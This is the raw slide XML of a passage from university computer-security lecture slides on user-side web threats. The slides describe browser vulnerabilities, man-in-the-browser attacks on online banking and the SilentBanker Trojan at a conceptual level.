              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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112796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A744A-EF4B-4A38-853C-90C1AC1DD7BB}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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77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E31D2D-B351-4B5B-8151-21A8AD3EEC72}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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2997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7C1D3-02FE-432B-95EF-DCA8BD0CB50F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6518479"/>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31254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AE4E0-FAAB-4210-A047-DA631847307A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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486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F2DAEDD-E3B0-4326-9018-AC1B07F2EDB4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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latin typeface="Arial"/>
              </a:rPr>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
        <p:nvSpPr>
          <p:cNvPr id="9" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55D44BD5-9DAB-F144-8B7A-653EC2DF728A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6518479"/>
            <a:ext cx="9144000" cy="329184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="l"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2788103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8"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F2DAEDD-E3B0-4326-9018-AC1B07F2EDB4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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latin typeface="Arial"/>
              </a:rPr>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
        <p:nvSpPr>
          <p:cNvPr id="9" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55D44BD5-9DAB-F144-8B7A-653EC2DF728A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6518479"/>
            <a:ext cx="9144000" cy="329184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="l"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96492532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F2DAEDD-E3B0-4326-9018-AC1B07F2EDB4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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latin typeface="Arial"/>
              </a:rPr>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
        <p:nvSpPr>
          <p:cNvPr id="9" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55D44BD5-9DAB-F144-8B7A-653EC2DF728A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6518479"/>
            <a:ext cx="9144000" cy="329184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="l"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78450307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ZdasoAGMQ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t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BDE3-8BA3-4F4C-B1D8-46CF1659886E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CISC 7320X - Computer Security </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1725802F-DD71-4E4B-BF11-6D084B5B1C38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Web—User Side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2B8C931-1200-4DF6-8988-A1B28F3B5451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5924550"/>
            <a:ext cx="8229600" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292934"/>
                </a:solidFill>
                <a:latin typeface="LiberationSans"/>
              </a:rPr>
              <a:t>Adapted from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292934"/>
                </a:solidFill>
                <a:latin typeface="LiberationSans-Italic"/>
              </a:rPr>
              <a:t>Security in Computing, Fifth Edition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292934"/>
                </a:solidFill>
                <a:latin typeface="LiberationSans"/>
              </a:rPr>
              <a:t>, by Charles P. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="292934"/>
                </a:solidFill>
                <a:latin typeface="LiberationSans"/>
              </a:rPr>
              <a:t>Pfleeger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292934"/>
                </a:solidFill>
                <a:latin typeface="LiberationSans"/>
              </a:rPr>
              <a:t>, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252433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Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-01.eps"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="590" r="293"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="564144" y="1791371"/>
            <a:ext cx="7992541" cy="4364789"/>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0752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EC22-5839-724D-B5E8-4B493512BB7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE5CE4F0-51BA-8C45-8BBF-F06BF12E48AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{413C57C7-B059-534D-9053-36B334A57CBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="621632" y="1401417"/>
            <a:ext cx="7531768" cy="4653775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF42576B-A7B1-7749-B3DF-E0F34C4E48F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621632" y="6139934"/>
            <a:ext cx="4959563" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>www.statista.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/chart/7451/chrome-most-vulnerable-browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378046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Attack Types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Man-in-the-browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Keystroke logger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Page-in-the-middle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Program download substitution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>User-in-the-middle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="36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74312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F941-1C47-4B3F-9ACE-90B817EBC97F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Man-in-the-browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47739A14-EF49-4753-8881-5964529A65F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker modifies web pages </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in a completely covert fashion </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>invisible to both the user and host web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A type of Trojan horse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some trojans will be detected and removed by antivirus SW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277073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CAD6-EA57-B345-940E-868B1122B005}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Man-in-the-browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27776BE6-8639-FA42-9890-60540DD30811}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious code that has infected a browser </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code inserted into the browser can read, copy, and redistribute user browser input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The threat here is that the attacker will intercept and reuse credentials </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To access financial accounts and other sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77E11D2B-0774-B049-B8BC-50F90A29A825}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5BFA158B-7C94-F543-87DB-41F59EA4FAFA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="451699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F941-1C47-4B3F-9ACE-90B817EBC97F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Man-in-the-browser - Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47739A14-EF49-4753-8881-5964529A65F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack on an internet banking funds transfer: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The customer will always be shown, via confirmation screens, the exact payment information as keyed into the browser. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The bank, however, will receive a transaction with materially altered instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>i.e. a different destination account number and possibly amount. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116119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F941-1C47-4B3F-9ACE-90B817EBC97F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Man-in-the-browser - Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47739A14-EF49-4753-8881-5964529A65F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack on an internet banking funds transfer (cont.): </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The use of strong authentication tools may create an increased level of misplaced confidence on the part of both customer and bank</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that the transaction is secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>authentication is concerned with the validation of identity credentials. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This should not be confused with transaction verification. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2033357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7B12-074D-4399-A75F-4CC83022125D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SilentBanker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF27E539-B909-4E32-9E34-95192ACB0F5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SilentBanker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was a Trojan that generally installed as a browser plug-in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When it detected the user going to a banking URL, it would:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>intercept </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>keystrokes and even modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>them so that money transfers would go to attackers’ accounts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1597391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Man-in-the-Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-02.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42" b="-4361"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="988806" y="1563624"/>
            <a:ext cx="7162800" cy="4987746"/>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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Aria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991867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F5B-7960-8149-A89E-6E9D01190351}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SilentBanker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{606A5EB6-D025-024D-96ED-B74D70A27A05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SilentBanker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> started with a list of over 400 URLs of popular banks throughout the world. </a:t>
